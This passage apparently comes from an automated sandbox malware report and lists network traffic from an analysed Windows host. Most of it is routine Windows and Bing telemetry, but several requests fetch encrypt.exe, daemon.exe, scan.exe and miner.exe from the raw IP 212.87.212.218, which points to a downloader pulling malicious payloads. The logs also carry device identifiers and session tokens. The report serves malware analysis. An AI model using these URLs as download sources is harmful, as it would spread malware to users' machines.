10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134X-Device-isOptin: trueAccept-language: en-US, enX-Device-IsEnergyHero: falseX-Device-Touch: falseX-Device-ClientSession: 3D03616141EB407B8D13A46D34A66D26X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderHost: www.bing.comConnection: Keep-AliveCookie: MUID=7E1F7E3AB9E24BF9AA0D8F6664CA6F63
          Source: global trafficHTTP traffic detected: GET /client/config?cc=US&setlang=en-US HTTP/1.1X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061395240662859X-DeviceID: 0100748C0900F661X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDgAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQu6GTFrNWvnx/6mkNZl7EYZBgAOAVvTU1YEGPx%2B9UmE25nRF6nASWESBppCXi/0FaDRJ77ZOkvmiByX0kY3/wFepGjPR9GcGu8UT2rwV6gj0IEOmLSbtJn4McGB1o4MVttpvOW9rGGK8oE63U78iYgrh2XPhLUR012oWM5tKmpQu2R1P6/QUWAop//HqG8hK2odcvrjXxF0mOUrYYXoz9zhWlkypEas%2BF7/nUrB8IWbgOe3uVzztfIHmx5naIkOwdo2OkgNP1ph/akMvcSPjLQvVWSkocaohVL9QAUvDpij1gZvhv0WaVG4Qmdd/%2Bi3/9KcHwZF6JVS1YVUeSzeyVUDZgAACAUexxILvs2wsAEio1PYwyKuG03er9lRLKaZn8brD4QoPqWJMdA41%2B3SWGiDu4vgv%2BTHDBD1WDtUU9twHyYt4DTa5i1BlEqlDb9t9%2BpkNOASQ6/Ur2o6y4QiyMQ0By07Y5FCJUHahAcqFsRrebed09beCE02JKc4GFSAelXc2IjGfuJ%2BSHPg4wXUjyco%2BOH32KuY3QPdtqjFMbwgJfg5cgGJlYslyB7izaJkNWQPiXXfunOxpHTQTkte5cP/eNXRBY4fodWXbxZcS6jJNMOWzejvqk6PZS6E5%2B40iCjlIZed3MTEpE37NjMTXbJetZyonLh44rMyOGoFQbPeafcG5A6BV0Vgf6jHddiJ/IcNUzJ/e5K1hAdwMS60SRAXwOxnIJHAXjRCDFQLIow%2BjUAP5GDMl1Nm77pdO8z%2BKwpWu7%2BojHn%2BZweEfdrXMww%2B9JT3jw7oJKu74brZVaEKAllotZZOR32EhwqFhLmgreM6elniCTLxaJi1kZPLPR1i8y9tnTZZncs8fPsmty4Hg%2BZGiLU9A49XBeAQ4yoks62OKkqbp6gbVZvJo/wB0BWJZOapZHrz%2BfcdfsQgZKbZAQ%3D%3D%26p%3DX-Agent-DeviceId: 0100748C0900F661X-BM-CBT: 1660406775User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134X-Device-isOptin: trueAccept-language: en-US, enX-Device-Touch: falseX-Device-ClientSession: 3D03616141EB407B8D13A46D34A66D26X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderHost: www.bing.comConnection: Keep-AliveCookie: MUID=7E1F7E3AB9E24BF9AA0D8F6664CA6F63
          Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160713Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=dde0feed7425474480f129d9c69403b3&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-280815&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAeMOlGuVfwyuxfJAXV0g2yPRqivWt+Igxsp9rdCqLzLW+Yd/6rf+14/B4CiLIOwlrhIZlw3ElgEVbh6fvSbD9MD4pnZYNvgjbQYodtNmO9b3TQObvO9Ze3bFd5SqeGNuo38vQcpcj0ItHj9OemLgIRuGARq0VWVia3+LzpoCA22riTCH+DpYQ0VkP8M11juQbgV0lxWAGDRMfzwcTIG03vZKFINLEh65N6oWTA5FUITzLfhqHXko5bxMxtRe2DYSR6A8++voccy5y6hPGHXFc+bj7W9S8iTu5lgSp8DmhPAKvKkXKfRSyH8WJBwo/adHhGTLETHdkSKaTOBrLFZtmMUDZgAACG41ulcLcdC6sAGbZcX85UtZ6TKhnHDdIcRMo+1OkVxDs499MDh21nxQPnr8qtE8qSL0QllVS6+gqGYtAb7kf15hYgS29FLcMvjcm5Vuq9heOu0l7APLeS7dsxw5skAhGeBlCzbgp/Xezdo5dKLyaSTFdU35MpquJCGcs4IkkRfhzoe1pzb/D4O5awoJPgCsQMku1iq8MX277Vvum5T7+4Kj/rNPX/8S6v+g17teT3fnhHo5uVKd0N4dIFK5Hcly2/16VJBjcG1FdSAQH43HB7HAA4pvWZMYaCO9AvKFstd+5aDt/A5SEW8FLz9p3C7JDxmAyyrCAo6rUvf+XQE60v1S4IOFtziTcUi0jtUWJ1xEIiAgeQKtagKJe7qgcUhf+Hj/+N1bHKBz2d6Zi9p+1fEje0wHi/lIkRmgqEKMdB485EvuWuljOvusdCKoqwOW1YMOULmdT+qRJFIftfbf1z7jMzCAqx9G+WrcHsNcprJPth5zGqxhFK5kOy2AyoNKGJ9SjacT8Ejt8APCH5847PRqTZmVsSI6+wy1MEX87psvZUYjItMHJ7/Ree2kZsuDxDbS8Ibr11NBZa7ZAQ==&p=Cache-Control: no-cacheMS-CV: 2nJdRnC0TEiwNFBi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160713Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=fa4bc4b84f4f4c9e8636d3433a31d127&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-338389&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAV5h4VnNbMe0CMUprulq7TgTt1NOO2vJcOFIUe76yd9D/3F5PKOpOD6fSE/Bqh+IS1TR7vDmbPTirai+obtgNFkH9g0PtQlcg0yMH4YdAlBT1IdgkTGKB3PXPa2hWPjnDF7kHyT0dq55ZY7UXPGRZmJlHM1IcwocIyiHRvILVhhkseEoE1yENgZCemJyIAsBaDXZxmQhyoqVngXTME27n2cXxdzBAUG+i2Z/F+20GJAsd6lPCxiYbP/rLVYhBbbragNJD46PzFzHIVy4sScZi6DTd7y0XMx+h0vimSAZCVN1sMxIdgJSxlkVGZzk8x1ej9/fG3dcqCtS7WXObAi+sJMDZgAACIciqMpZvOR1sAEp1GevXTt1kTMxzO4VQDZMjI9Eua8BH8Dy5XfThiu4sYakBJOcvwAvJfPDaCDbjnLkJDo6gG/RRCZ+9607hbscsHm/DHnXN7zxUUMgYFO1n7q/jiU7jfBdCyD7ML/90yskVRZgerci40hvvuYFvJNz0OrW9yiy3yHwapMkSat2C0a3GCVticwP9KoPTPXX/rtSLM2e8OAH3Q0SN+ZowogZAbFI76Vj2a7qoOtS/Wy75u3l+BKi41M9SP55Q7mUl3MRfILEmTq9YGIlVwo/ERpG1Y1cJFqQ9+5TV5ex0f8s6huthhUGTjIVcQa70QZNrsqQcfyvNVQStTriNbq+MaZ3Kyhb72AnhS6RsFkciQXqs2BZ5Uhx9UcV9w8p6n6cYDydmgo1LEH6oXMl6OqDfULCA/ZlkuMt610eHnvUWyy6PKz/wXjTjY34k8ZLVKilyjfNkjr5/8QHRXzBlF16kHNagrtCJNPYP8eF9SZ0mAvr2ycpUaprjHjmmTUQYZlcAKvrQqT7Ali+HbpDmH49yrNiMzahDXCsjWmlsAlH7uHDFa3Gn2EhHSoegK//0Hw4GrvZAQ==&p=Cache-Control: no-cacheMS-CV: 2nJdRnC0TEiwNFBi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160727Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ec9aec0afaf3446bbdd5156e92b72644&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-338387&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&rver=2&sc-mode=0&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAeMOlGuVfwyuxfJAXV0g2yPRqivWt+Igxsp9rdCqLzLW+Yd/6rf+14/B4CiLIOwlrhIZlw3ElgEVbh6fvSbD9MD4pnZYNvgjbQYodtNmO9b3TQObvO9Ze3bFd5SqeGNuo38vQcpcj0ItHj9OemLgIRuGARq0VWVia3+LzpoCA22riTCH+DpYQ0VkP8M11juQbgV0lxWAGDRMfzwcTIG03vZKFINLEh65N6oWTA5FUITzLfhqHXko5bxMxtRe2DYSR6A8++voccy5y6hPGHXFc+bj7W9S8iTu5lgSp8DmhPAKvKkXKfRSyH8WJBwo/adHhGTLETHdkSKaTOBrLFZtmMUDZgAACG41ulcLcdC6sAGbZcX85UtZ6TKhnHDdIcRMo+1OkVxDs499MDh21nxQPnr8qtE8qSL0QllVS6+gqGYtAb7kf15hYgS29FLcMvjcm5Vuq9heOu0l7APLeS7dsxw5skAhGeBlCzbgp/Xezdo5dKLyaSTFdU35MpquJCGcs4IkkRfhzoe1pzb/D4O5awoJPgCsQMku1iq8MX277Vvum5T7+4Kj/rNPX/8S6v+g17teT3fnhHo5uVKd0N4dIFK5Hcly2/16VJBjcG1FdSAQH43HB7HAA4pvWZMYaCO9AvKFstd+5aDt/A5SEW8FLz9p3C7JDxmAyyrCAo6rUvf+XQE60v1S4IOFtziTcUi0jtUWJ1xEIiAgeQKtagKJe7qgcUhf+Hj/+N1bHKBz2d6Zi9p+1fEje0wHi/lIkRmgqEKMdB485EvuWuljOvusdCKoqwOW1YMOULmdT+qRJFIftfbf1z7jMzCAqx9G+WrcHsNcprJPth5zGqxhFK5kOy2AyoNKGJ9SjacT8Ejt8APCH5847PRqTZmVsSI6+wy1MEX87psvZUYjItMHJ7/Ree2kZsuDxDbS8Ibr11NBZa7ZAQ==&p=Cache-Control: no-cacheMS-CV: 2nJdRnC0TEiwNFBi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160727Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=765f97b95e1c458290318a5835743286&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-338388&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAeMOlGuVfwyuxfJAXV0g2yPRqivWt+Igxsp9rdCqLzLW+Yd/6rf+14/B4CiLIOwlrhIZlw3ElgEVbh6fvSbD9MD4pnZYNvgjbQYodtNmO9b3TQObvO9Ze3bFd5SqeGNuo38vQcpcj0ItHj9OemLgIRuGARq0VWVia3+LzpoCA22riTCH+DpYQ0VkP8M11juQbgV0lxWAGDRMfzwcTIG03vZKFINLEh65N6oWTA5FUITzLfhqHXko5bxMxtRe2DYSR6A8++voccy5y6hPGHXFc+bj7W9S8iTu5lgSp8DmhPAKvKkXKfRSyH8WJBwo/adHhGTLETHdkSKaTOBrLFZtmMUDZgAACG41ulcLcdC6sAGbZcX85UtZ6TKhnHDdIcRMo+1OkVxDs499MDh21nxQPnr8qtE8qSL0QllVS6+gqGYtAb7kf15hYgS29FLcMvjcm5Vuq9heOu0l7APLeS7dsxw5skAhGeBlCzbgp/Xezdo5dKLyaSTFdU35MpquJCGcs4IkkRfhzoe1pzb/D4O5awoJPgCsQMku1iq8MX277Vvum5T7+4Kj/rNPX/8S6v+g17teT3fnhHo5uVKd0N4dIFK5Hcly2/16VJBjcG1FdSAQH43HB7HAA4pvWZMYaCO9AvKFstd+5aDt/A5SEW8FLz9p3C7JDxmAyyrCAo6rUvf+XQE60v1S4IOFtziTcUi0jtUWJ1xEIiAgeQKtagKJe7qgcUhf+Hj/+N1bHKBz2d6Zi9p+1fEje0wHi/lIkRmgqEKMdB485EvuWuljOvusdCKoqwOW1YMOULmdT+qRJFIftfbf1z7jMzCAqx9G+WrcHsNcprJPth5zGqxhFK5kOy2AyoNKGJ9SjacT8Ejt8APCH5847PRqTZmVsSI6+wy1MEX87psvZUYjItMHJ7/Ree2kZsuDxDbS8Ibr11NBZa7ZAQ==&p=Cache-Control: no-cacheMS-CV: 2nJdRnC0TEiwNFBi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /encrypt.exe HTTP/1.1Host: 212.87.212.218User-Agent: Go-http-client/1.1Accept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /doanlowd.txt HTTP/1.1Host: 212.87.212.218Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /daemon.exe HTTP/1.1Host: 212.87.212.218
          Source: global trafficHTTP traffic detected: GET /doanlowd.txt HTTP/1.1Host: 212.87.212.218Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rar/d06ed635-68f6-4e9a-955c-4899f5f57b9a:ZIARU67GX6SIHMGGTFEQWXLIAQXP3BH2RIYWTAXNR2AYP4GMLN2IUBNP47H3RXLIM55O627ZFLTQUTLMGXQMS3XLRLHN4XZPUVGB5YMOPVXWHR6NQUHQZIWOKP44Y42KDNTXJNLISXS3QAZDUUBRPQXWOJF4VPYDBHKWPUKGXA7JWBUKYUMLY77ZZHUKFRKFTLEJ3ZOEG6E6C=== HTTP/1.1Host: 212.87.212.218User-Agent: Go-http-client/1.1Accept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /scan.exe HTTP/1.1Host: 212.87.212.218User-Agent: Go-http-client/1.1Accept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /miner.exe HTTP/1.1Host: 212.87.212.218User-Agent: Go-http-client/1.1Accept-Encoding: gzip
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Aug 2022 07:07:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.137
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.82.209.183
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.132
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.132
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.132
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.132
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.132
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.132
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.134
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.134
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.134
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownTCP traffic detected without corresponding DNS query: 212.87.212.218
          Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
          Source: unknownHTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.7:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.7:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.3:443 -> 192.168.2.7:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.32.72:443 -> 192.168.2.7:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49775 version: TLS 1.2
